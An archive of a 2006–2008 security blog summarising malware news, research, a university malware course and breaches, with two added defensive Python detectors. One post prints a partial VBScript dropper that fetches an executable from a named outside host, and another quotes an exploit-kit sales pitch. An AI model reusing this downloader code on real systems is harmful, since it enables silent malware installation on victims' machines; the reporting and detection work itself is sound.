Of Spam & Men


Monday 28 January 2008

Studying Malware Analysis In College

F-Secure is about to start a course called "Malware Analysis and Antivirus Technologies" at the Helsinki University of Technology. I really wish we had had that kind of class when I was attending college!

And since F-Secure is full of cool people, they provide the slides from the lectures that have already been given!

On the menu:

  • General introduction of the course [slides]
  • Fighting Online Crime [slides]
  • Windows operating system: Antivirus perspective.
  • Legal aspects of reverse engineering. Reverse engineering I
  • Reverse engineering II
  • Reverse engineering tools hands on classes
  • Mobile malware.
  • Using debuggers to analyze malware
  • Emulators and disassemblers. Behavioral analysis of malware.
  • Reverse engineering III
  • Unpacking and decrypting malware
  • Antivirus engine design.

from F-Secure

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers differ slightly from Netcraft's, but they give a fairly good explanation of why. According to Google, IIS and Apache each account for the same share of the web servers distributing malware overall.

Interesting facts: in the US, 80% of malware is served by Apache; in China, 95% by IIS...

From Google Online Security Blog

Tuesday 24 July 2007

iphone vulnerability video

A vulnerability was found in Mobile Safari allowing an intruder to get access to your iPhone's filesystem. See the video:

Get the iPhone's technical security analysis by securityevaluators.com: here

Monday 23 July 2007

Chat^WTroll with malware authors

CastleCops.com is a popular site that aims to provide information supporting computer security education. Their forums are particularly useful when you think something fishy is going on, as a lot of very well-informed people participate.

Recently a conversation about rogue domains used by the (nasty) Zlob malware was posted, and the malware author came along and tried to explain that his little creation wasn't malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

facetime: IM & P2P attacks on the rise

FaceTime Security Labs, a research lab focused on IM security, recently reported that IM & P2P attacks were on the rise: a 5% increase in incidents targeting public IM and P2P channels in Q2 2007 compared to Q1 2007. For comparison, over the same period in 2006 a 35% decrease was seen.

The SpywareGuide Greynets Blog summarizes:

From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN and AOL) dropped from 74 total incidents in the first period to 64 in the second quarter. Attacks spread via AOL dropped by more than half (from 28 incidents to 13). Overall, the MSN network accounted for 50 percent of the attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20 percent.

As we predicted earlier this year, attacks spread via Internet Relay Chat (IRC) continue to account for a growing percentage of all attacks. In fact, the percentage of attacks that are IRC-based has risen in each of the last six quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the current quarter.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock


Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: what if he used AdWords and told people to visit his blog to get infected with malware? His ad said "Is your PC virus-free? Get it infected here!" and it ran for 6 months. Of course, clicking on the link would not infect the visitor's computer, but still, it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? Well, I guess people don't read. How many people use Google to surf, thinking that AdWords ads are actually results given by Google?

Saturday 10 March 2007

Fun with cellphones

Ever heard of the cellphone cloning method? It's a way of transferring the identity of one phone to another, generally for the purpose of making fraudulent calls. It's fun because if you are located near the same transmission tower as the cellphone you cloned, you'll get copies of text messages and calls made to the original phone. You'll need to have access to the original cellphone and clone the SIM, then upload the SIM data into your phone. No easy thing.

What about being able to get any unencrypted transmission made around your cellphone directly on it?

Continue reading...

virus watch: warezov domains

Warezov, SpamThru... viruses used by spammers. They are pretty easy to detect if you can monitor HTTP connections: more and more viruses try to fetch data (spam templates or updates) from dedicated domains. If you can monitor connections to those domains, you can detect infected computers on your network.
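The detection the post describes, written out as an added example (this is not code from the original post): a watchlist of domains that bots poll for templates or updates is matched against proxy log lines, and every internal client that contacted one of them is reported. The watchlist entries, the log format and the log lines are all constructed placeholders; a real deployment would load indicators from a threat-intel feed and read the proxy's actual access log. Matching walks up the parent domains, so a bot hiding behind a fresh subdomain of a watched domain is still caught.

```python
"""Flag internal hosts that contact known malware update/template domains.

Added example, not from the original post. WATCHLIST and SAMPLE_LOG are
constructed placeholders (".invalid" TLD), not real indicators.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed watchlist: domains a bot is known to poll for spam templates
# or updates. Placeholders, not real indicators from the post.
WATCHLIST = {
    "update.example-warezov.invalid",
    "templates.example-spamthru.invalid",
}

# Constructed proxy log lines in a squid-like layout:
# "<epoch> <client_ip> <method> <url> <http_status>"
SAMPLE_LOG = """\
1173517201 10.0.0.12 GET http://update.example-warezov.invalid/cfg.bin 200
1173517202 10.0.0.7 GET http://www.example.com/index.html 200
1173517205 10.0.0.12 GET http://cdn.templates.example-spamthru.invalid/tpl.zip 200
1173517210 10.0.0.31 GET http://UPDATE.EXAMPLE-WAREZOV.INVALID:8080/cfg.bin 404
1173517211 malformed line here
1173517215 10.0.0.7 CONNECT mail.example.com:443 200
"""


def parse_line(line):
    """Return (client_ip, host) for one log line, or None if it cannot be parsed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    client_ip, method, url = parts[1], parts[2], parts[3]
    if method == "CONNECT":
        # CONNECT requests carry "host:port" rather than a full URL.
        host = url.rsplit(":", 1)[0]
    else:
        host = urlsplit(url).hostname
    if not host:
        return None
    return client_ip, host.lower()


def watched_parent(host, watchlist):
    """Return the watchlist entry matching host or one of its parent domains
    (so cdn.templates.x also matches templates.x), else None."""
    labels = host.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in watchlist:
            return candidate
    return None


def find_infected_hosts(log_text, watchlist=WATCHLIST):
    """Map each client IP to the set of watched domains it contacted.
    A 404 still counts: the bot asked, and that request is the signal."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip lines that do not fit the expected layout
        client_ip, host = parsed
        matched = watched_parent(host, watchlist)
        if matched:
            hits[client_ip].add(matched)
    return dict(hits)


if __name__ == "__main__":
    for ip, domains in sorted(find_infected_hosts(SAMPLE_LOG).items()):
        print(f"{ip}: {', '.join(sorted(domains))}")
```

Run against the constructed log, this reports 10.0.0.12 (two watched domains, one reached through a subdomain) and 10.0.0.31 (a request that got a 404 but still shows the host is polling), while the malformed line and the CONNECT to the mail server are ignored.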

Continue reading...

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Wednesday 3 January 2007

Research: IM Malware Attacks on the Rise

According to a new research report produced by security software maker Akonix Systems, in San Diego, experts at the company unearthed some 406 new IM-borne threats over the last 12 months, compared with 347 attacks tracked by the company in 2005.

In 2004 the company's security analysts discovered just under 50 attacks that were carried out either via IM or peer-to-peer technologies.

However, attacks delivered via P2P networks appear to be falling in popularity, as Akonix researchers recorded an 11 percent decrease in that type of threat during December 2006, with only 16 such attacks reported for the month. Akonix traditionally reports its research of IM and P2P threats simultaneously.

Continue reading...

Wednesday 13 December 2006

Hacker Infiltrates UCLA, Data on 800,000 People

eWeek reports:

An unknown hacker has infiltrated a massive University of California, Los Angeles database with personal information on 800,000 people, the school said on Tuesday, in one of the worst computer breaches ever at a U.S. university.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards


More and more banking institutions are replacing the usual username/password form with a virtual keyboard. The sole purpose of this method is to defeat keyloggers.

Unfortunately for them, more and more malware also defeats the purpose of using virtual keyboards. The guys at VirusTotal analyzed a new trojan that performs a series of small screen captures of the area around the mouse cursor. It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Friday 24 November 2006

Malicious crypto: (Ab)use cryptology

This is a very interesting lecture by Frederic Raynal from the French security magazine MISC:

Cryptology is everywhere nowadays. Most of the time, people don't even know they are actually using it on a daily basis. In this lecture, we'll show how cryptography is actually a double-edged sword. Despite cryptology's common use as a defensive tool, providing primitives like confidentiality and integrity, we'll see how to use cryptology for malicious purposes. We use it here to improve target selection during attacks, to save time or to be as stealthy as possible.

Continue reading...

Thursday 23 November 2006

Vista's Bitlocker: More security for laptops

Vista's Enterprise and Ultimate editions will introduce a new (for Windows) security feature called BitLocker:

BitLocker Drive Encryption is a data protection feature available in Windows Vista Enterprise and Ultimate for client computers and in Windows Server "Longhorn". BitLocker is Microsoft’s response to one of our top customer requests: address the very real threats of data theft or exposure from lost, stolen or inappropriately decommissioned PC hardware with a tightly integrated solution in the Windows Operating System.

You can configure Vista to require a USB key or flash drive to boot. If the user can't provide the right key, the data on the hard drive stays encrypted and (relatively) secure.

Continue reading...

Malware 2.0: Malware utilizes AJAX to install itself


Well, ok, it's not really AJAX. This malware uses a bit of HTML that uses XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antivirus products and you get W32/new-malware!Maximus on your hard drive:

<title></title>
<head></head>
<body>
<script language="VBScript">
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")

Continue reading...
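Seen from the defender's side, the snippet above is a cluster of traits that rarely appear together on a legitimate page: a VBScript block, error suppression, an object created from the classid shown in the post, a CreateObject call, the Microsoft.XMLHTTP ProgID, and an executable URL. The added example below (not code from the original post or from the malware) scores an HTML page against those indicators. Because the dropper hides the ProgID in a variable rather than passing it literally, the scanner looks for each trait independently instead of for one exact line. The two sample pages are constructed, with a placeholder ".invalid" URL in place of a real download location.

```python
"""Score HTML pages against the traits of the VBScript downloader pattern.

Added example, not from the original post. SUSPECT_PAGE and BENIGN_PAGE are
constructed samples; the download URL is a placeholder.
"""
import re

# Each indicator is (name, compiled regex). One trait alone is not a
# verdict; the combination is what matters, hence the score threshold.
INDICATORS = [
    ("vbscript_block", re.compile(r"<script[^>]*language\s*=\s*[\"']?vbscript", re.I)),
    ("error_suppression", re.compile(r"on\s+error\s+resume\s+next", re.I)),
    # The classid the snippet in the post instantiates its helper object from.
    ("object_classid", re.compile(r"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36", re.I)),
    ("createobject_call", re.compile(r"CreateObject\s*\(", re.I)),
    ("xmlhttp_progid", re.compile(r"Microsoft\.XMLHTTP", re.I)),
    ("exe_url", re.compile(r"https?://[^\s\"'<>]+\.exe\b", re.I)),
]

# Constructed sample mirroring the structure of the snippet in the post,
# with a placeholder URL.
SUSPECT_PAGE = """<html><head></head><body>
<script language="VBScript">
on error resume next
dl = "http://dropper.example.invalid/payload.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
</script></body></html>"""

# Constructed benign page: ordinary JavaScript use of XMLHttpRequest, which
# must not trip the scanner even though it also "uses AJAX".
BENIGN_PAGE = """<html><body>
<script type="text/javascript">
var req = new XMLHttpRequest();
req.open("GET", "https://www.example.com/api/status.json");
req.send();
</script></body></html>"""


def scan_html(html, threshold=3):
    """Return (flagged, matched_indicator_names).

    flagged is True when at least `threshold` distinct indicators are present.
    """
    matched = [name for name, rx in INDICATORS if rx.search(html)]
    return len(matched) >= threshold, matched


if __name__ == "__main__":
    for label, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        flagged, names = scan_html(page)
        print(f"{label}: flagged={flagged} indicators={names}")
```

The threshold is deliberately above one: a page that merely mentions Microsoft.XMLHTTP, or that links to an installer, should not be flagged, while the constructed dropper-style page hits all six traits.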

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for building malicious sites. It's supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the internet browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just supply the malware, a keylogger or whatever you want to infect your visitors with.

Continue reading...

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a piece of malware. Their case study is a very complete and interesting analysis of a yet-to-be-named malware sample (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group. The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...

Polish Police Own3d

Looks like one of the Polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team named "un-root". Zone-H has a mirror of the defacement here.

Continue reading...